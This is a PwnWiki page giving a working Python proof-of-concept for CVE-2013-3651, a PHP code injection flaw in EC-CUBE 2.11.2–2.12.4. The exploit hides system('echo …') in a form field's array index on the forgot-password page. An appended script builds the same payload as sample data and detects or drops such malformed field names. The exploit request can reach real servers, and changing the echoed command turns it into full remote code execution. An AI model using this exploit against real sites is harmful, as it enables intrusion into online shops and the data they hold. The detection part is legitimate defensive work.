CVE-2013-3651 LOCKON EC-CUBE 2.11.2 through 2.12.4 PHP code injection vulnerability

From PwnWiki
Revision as of 10:52, 6 April 2021 by Pwnwiki

Usage

$ python poc_cve_2013_3651.py <Target URL>

e.g.
$ python poc_cve_2013_3651.py http://127.0.0.1:9000/
Result: Vulnerable!

The script (Python 3) fetches the forgot-password form at <Target URL>/forgot/ to pick up its transactionid, then posts a mail_check request in which one field name carries PHP code as an array index: name01[system('echo CVE$1_2013_3651')]. The request never contains the literal string CVE_2013_3651; the shell expands the unset positional parameter $1 to nothing, so that marker can only show up in the response if the target evaluated the index as PHP and ran the command. If it does, the script reports "Vulnerable!".


POC

import re
import sys
import urllib.parse
import urllib.request

args = sys.argv

if len(args) != 2:
    print('Using: python poc_cve_2013_3651.py <Target URL>')
    sys.exit(1)

# Cookie-aware opener: the transactionid has to be sent back in the same
# session that issued it.
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
url = '%s/forgot/' % args[1].rstrip('/')

# Get transaction value (the token embedded in the forgot-password form).
req = urllib.request.Request(url)
res = opener.open(req)
body = res.read().decode('utf-8')
res.close()
match = re.search(r' name="transactionid" value="([a-z0-9]+)"', body)
if match is None:
    print('Result: no transactionid found at %s (not an EC-CUBE /forgot/ page?)' % url)
    sys.exit(1)
transactionid = match.group(1)

# Post Check request. The PHP code rides in the *parameter name*: the array
# index of name01 is system('echo CVE$1_2013_3651'). The literal string
# "CVE_2013_3651" never appears in the request; the shell expands the unset
# positional parameter $1 to nothing, so the marker can only appear in the
# response if the server evaluated the index as PHP and executed the command.
post_data = urllib.parse.urlencode({
    'transactionid': transactionid,
    'mode': 'mail_check',
    'email': '',
    "name01[system('echo CVE$1_2013_3651')]": '',
    'name02': ''
}).encode('utf-8')

# Reuse the Request object for the same URL; opener.open() attaches the POST body.
res = opener.open(req, post_data)
body = res.read().decode('utf-8')
res.close()

# print (body)
if re.findall(r'CVE_2013_3651', body):
    print('Result: Vulnerable!')
else:
    print('Result: Not vulnerable...')
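As an added example (not part of the PwnWiki PoC and not EC-CUBE's own code), the following script shows the defensive counterpart of the request above: it parses a URL-encoded POST body built the same way the PoC builds its request and flags any form field whose array index is not empty, a digit string or a plain identifier, which is exactly the shape the payload name01[system('echo CVE$1_2013_3651')] takes. The sample bodies are constructed here, and the function names key_is_safe, suspicious_keys and safe_form_fields are this example's own.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Constructed sample POST bodies (not captured traffic). The first is built with
# urlencode exactly as the PoC above builds its request; the others are benign
# submissions of the same form, including legitimate PHP-style array fields.
SAMPLE_BODIES = {
    "poc": urlencode({
        'transactionid': 'deadbeef01',
        'mode': 'mail_check',
        'email': '',
        "name01[system('echo CVE$1_2013_3651')]": '',
        'name02': '',
    }),
    "benign_scalar": urlencode({
        'transactionid': 'deadbeef01',
        'mode': 'mail_check',
        'email': 'taro@example.com',
        'name01': 'Taro',
        'name02': 'Yamada',
    }),
    "benign_array": urlencode({
        'transactionid': 'deadbeef01',
        'mode': 'mail_check',
        'item[0]': '1',
        'item[qty]': '2',
        'tags[]': 'x',
    }),
}

# A form key is "name" optionally followed by one or more [index] parts.
KEY_SHAPE = re.compile(r'^[A-Za-z0-9_]+((?:\[[^\]]*\])*)$')
INDEX_RE = re.compile(r'\[([^\]]*)\]')
# A legitimate array index is empty (tags[]), digits, or a plain identifier.
# Quotes, parentheses, "$", ";" and spaces never belong in one.
SAFE_INDEX = re.compile(r'^[A-Za-z0-9_]*$')


def key_is_safe(key: str) -> bool:
    """True if a form field name has no PHP-code-like content in its array indices."""
    m = KEY_SHAPE.match(key)
    if m is None:
        return False
    return all(SAFE_INDEX.match(idx) for idx in INDEX_RE.findall(m.group(1)))


def suspicious_keys(body: str) -> list:
    """Detection side: every field name in a form body that fails key_is_safe."""
    return [k for k, _ in parse_qsl(body, keep_blank_values=True) if not key_is_safe(k)]


def safe_form_fields(body: str) -> dict:
    """Hardening side: keep only well-formed field names, so an injected
    name01[...] key is dropped before anything could evaluate it."""
    return {k: v for k, v in parse_qsl(body, keep_blank_values=True) if key_is_safe(k)}


if __name__ == '__main__':
    for label, body in SAMPLE_BODIES.items():
        print('%-14s suspicious=%s' % (label, suspicious_keys(body)))
```

The check is on the field name, not the value: the PoC's $1 trick means the marker string is never in the request, so a value-based signature would miss it, while an index that contains anything but digits or identifier characters is never a legitimate form field and is safe to reject outright.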